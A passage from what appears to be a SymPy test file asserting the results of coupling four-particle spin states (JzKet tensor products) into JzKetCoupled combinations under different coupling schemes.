(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
)
)
== -sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, S.Half), (1, 4, Rational(3, 2))),
)
/ 3
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
)
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, S.Half)),
)
/ 2
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
)
)
== -sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
/ 5
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
)
) == JzKetCoupled(
Rational(5, 2),
Rational(-5, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (1, 3, Rational(3, 2)), (1, 4, Rational(5, 2))),
)
# Couple j1 to j2, j3 to j4
# j1=1/2, j2=1/2, j3=1/2, j4=1/2
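# Here the explicit scheme ((1, 2), (3, 4), (1, 3)) couples j1 to j2 and
# j3 to j4 first, then couples the two pairs together, giving
# ((1, 2, j12), (3, 4, j34), (1, 3, j)) entries in the coupled kets below.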
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
) == JzKetCoupled(
2, 2, (S(1) / 2, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, 1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, 1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 3
+ sqrt(2)
* JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, 1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 0), (1, 3, 0))
)
/ 2
- sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 6
+ JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== -JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 0), (1, 3, 0))
)
/ 2
- sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 6
+ JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, -1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, 1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, 1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== -JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 0), (1, 3, 0))
)
/ 2
- sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 6
- JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 0), (1, 3, 0))
)
/ 2
- sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 6
- JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 0), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, -1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(3)
* JzKetCoupled(
0, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 0))
)
/ 3
- sqrt(2)
* JzKetCoupled(
1, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ sqrt(6)
* JzKetCoupled(
2, 0, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 6
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, -1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 0), (1, 3, 1))
)
/ 2
- JzKetCoupled(
1, -1, (S.Half, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 1))
)
/ 2
+ JzKetCoupled(
2, -1, (S.Half, S(1) / 2, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
/ 2
)
assert couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
),
((1, 2), (3, 4), (1, 3)),
) == JzKetCoupled(
2, -2, (S(1) / 2, S.Half, S.Half, S.Half), ((1, 2, 1), (3, 4, 1), (1, 3, 2))
)
# j1=1/2, j2=1/2, j3=1/2, j4=1
assert couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
) == JzKetCoupled(
Rational(5, 2),
Rational(5, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(15)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== 2
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 2
* sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
- JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ 4
* sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 2
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 5
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(6)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 3
+ JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(5)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(3)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 6
+ sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(10)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S(1) / 2, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(3)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
+ JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 3
- sqrt(2)
* JzKetCoupled(
S.Half,
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 6
+ sqrt(6)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 6
- sqrt(2)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
- sqrt(10)
* JzKetCoupled(
Rational(3, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 30
+ sqrt(10)
* JzKetCoupled(
Rational(5, 2),
S.Half,
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 10
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, 0),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(6)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- sqrt(2)
* JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, S.Half)),
)
/ 6
- JzKetCoupled(
S.Half,
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, S.Half)),
)
/ 3
+ sqrt(3)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 3
- JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, S.Half), (1, 3, Rational(3, 2))),
)
/ 3
+ sqrt(5)
* JzKetCoupled(
Rational(3, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 15
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-1, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, S.Half),
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, Rational(-1, 2)),
JzKet(1, -1),
),
((1, 2), (3, 4), (1, 3)),
)
== sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 2
+ sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(-3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
JzKet(S.Half, S.Half),
JzKet(1, 1),
),
((1, 2), (3, 4), (1, 3)),
)
== -sqrt(2)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 0), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 2
- sqrt(30)
* JzKetCoupled(
Rational(3, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(3, 2))),
)
/ 10
+ sqrt(5)
* JzKetCoupled(
Rational(5, 2),
Rational(3, 2),
(S.Half, S.Half, S.Half, 1),
((1, 2, 1), (3, 4, Rational(3, 2)), (1, 3, Rational(5, 2))),
)
/ 5
)
assert (
couple(
TensorProduct(
JzKet(S.Half, Rational(-1, 2)),
JzKet(S.Half, S.Half),
